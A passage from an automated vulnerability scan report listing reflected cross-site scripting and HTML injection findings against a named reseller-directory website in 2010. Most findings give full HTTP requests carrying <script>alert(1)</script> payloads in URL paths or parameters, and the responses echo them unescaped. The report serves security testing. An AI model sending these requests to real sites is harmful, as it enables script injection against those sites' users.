GET /detail1f834<script>alert(1)</script>ba55b2bcc29/16/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail1f834<script>alert(1)</script>ba55b2bcc29/16/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1372. http://www.resellerbase.com/detail/16/themes/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload db7ba<script>alert(1)</script>a8e8962b85b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16db7ba<script>alert(1)</script>a8e8962b85b/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16db7ba<script>alert(1)</script>a8e8962b85b/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1373. http://www.resellerbase.com/detail/16/themes/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 484bb<script>alert(1)</script>fa378a6a8c6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/themes484bb<script>alert(1)</script>fa378a6a8c6/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes484bb<script>alert(1)</script>fa378a6a8c6/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1374. http://www.resellerbase.com/detail/16/themes/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a010d<script>alert(1)</script>56e492b4b7d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/themes/search.phpa010d<script>alert(1)</script>56e492b4b7d?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/search.phpa010d<script>alert(1)</script>56e492b4b7d?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1375. http://www.resellerbase.com/detail/16/themes/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/16/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload fa9b2<a>6dc07b7a305 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/16/themes/search.php?keyword=search...&Submit3=Searchfa9b2<a>6dc07b7a305&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/search.php?keyword=search...&Submit3=Searchfa9b2<a>6dc07b7a305&opt=2 was not found on this server.</p>
...[SNIP]...

2.1376. http://www.resellerbase.com/detail/16/themes/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/16/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 23cb4<a>de4be190f33 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/16/themes/search.php?keyword=search...23cb4<a>de4be190f33&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/search.php?keyword=search...23cb4<a>de4be190f33&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1377. http://www.resellerbase.com/detail/16/themes/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5247f<script>alert(1)</script>296819c65a7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/themes/search.php?keyword=search...&Submit3=Search&opt=2&5247f<script>alert(1)</script>296819c65a7=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/search.php?keyword=search...&Submit3=Search&opt=2&5247f<script>alert(1)</script>296819c65a7=1 was not found on this server.</p>
...[SNIP]...

2.1378. http://www.resellerbase.com/detail/16/themes/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/16/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 89f65<a>ffb731e7082 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/16/themes/search.php?keyword=search...&Submit3=Search&opt=289f65<a>ffb731e7082 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/search.php?keyword=search...&Submit3=Search&opt=289f65<a>ffb731e7082 was not found on this server.</p>
...[SNIP]...

2.1379. http://www.resellerbase.com/detail/16/worldkom-net.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/worldkom-net.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload eaa9f<script>alert(1)</script>9b8335eace6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaileaa9f<script>alert(1)</script>9b8335eace6/16/worldkom-net.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:25:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaileaa9f<script>alert(1)</script>9b8335eace6/16/worldkom-net.html was not found on this server.</p>
...[SNIP]...

2.1380. http://www.resellerbase.com/detail/16/worldkom-net.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/16/worldkom-net.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 53aca<a>c3cfe8f720d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/1653aca<a>c3cfe8f720d/worldkom-net.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:25:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/1653aca<a>c3cfe8f720d/worldkom-net.html was not found on this server.</p>
...[SNIP]...

2.1381. http://www.resellerbase.com/detail/16/worldkom-net.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/worldkom-net.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 68b4c<script>alert(1)</script>d3ea630e3e9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/68b4c<script>alert(1)</script>d3ea630e3e9 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/68b4c<script>alert(1)</script>d3ea630e3e9 was not found on this server.</p>
...[SNIP]...

2.1382. http://www.resellerbase.com/detail/17/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 255a8<script>alert(1)</script>3226e67af9d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail255a8<script>alert(1)</script>3226e67af9d/17/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail255a8<script>alert(1)</script>3226e67af9d/17/ was not found on this server.</p>
...[SNIP]...

2.1383. http://www.resellerbase.com/detail/17/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 235c4<script>alert(1)</script>f12ea55b7d3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17235c4<script>alert(1)</script>f12ea55b7d3/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17235c4<script>alert(1)</script>f12ea55b7d3/ was not found on this server.</p>
...[SNIP]...

2.1384. http://www.resellerbase.com/detail/17/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e44e0<script>alert(1)</script>97a44163409 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/?e44e0<script>alert(1)</script>97a44163409=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/?e44e0<script>alert(1)</script>97a44163409=1 was not found on this server.</p>
...[SNIP]...

2.1385. http://www.resellerbase.com/detail/17/rating.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3de53<script>alert(1)</script>33bf19beaa8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail3de53<script>alert(1)</script>33bf19beaa8/17/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:36:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail3de53<script>alert(1)</script>33bf19beaa8/17/rating.php was not found on this server.</p>
...[SNIP]...

2.1386. http://www.resellerbase.com/detail/17/rating.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2e874<script>alert(1)</script>836d04761615000a5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail2e874<script>alert(1)</script>836d04761615000a5/17/rating.php?id=17&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/resellerclub-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail2e874<script>alert(1)</script>836d04761615000a5/17/rating.php?id=17&rating=5 was not found on this server.</p>
...[SNIP]...

2.1387. http://www.resellerbase.com/detail/17/rating.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8953e<script>alert(1)</script>3ccf81f52f7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/178953e<script>alert(1)</script>3ccf81f52f7/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:36:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/178953e<script>alert(1)</script>3ccf81f52f7/rating.php was not found on this server.</p>
...[SNIP]...

2.1388. http://www.resellerbase.com/detail/17/rating.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cfe40<script>alert(1)</script>ad6bbaf0ef71fe3e5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/17cfe40<script>alert(1)</script>ad6bbaf0ef71fe3e5/rating.php?id=17&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/resellerclub-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17cfe40<script>alert(1)</script>ad6bbaf0ef71fe3e5/rating.php?id=17&rating=5 was not found on this server.</p>
...[SNIP]...

2.1389. http://www.resellerbase.com/detail/17/rating.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 81f3a<script>alert(1)</script>ce67c22d53013dd55 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/17/rating.php81f3a<script>alert(1)</script>ce67c22d53013dd55?id=17&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/resellerclub-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/rating.php81f3a<script>alert(1)</script>ce67c22d53013dd55?id=17&rating=5 was not found on this server.</p>
...[SNIP]...

2.1390. http://www.resellerbase.com/detail/17/rating.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5b4c7<script>alert(1)</script>445c91feaa5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/rating.php5b4c7<script>alert(1)</script>445c91feaa5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
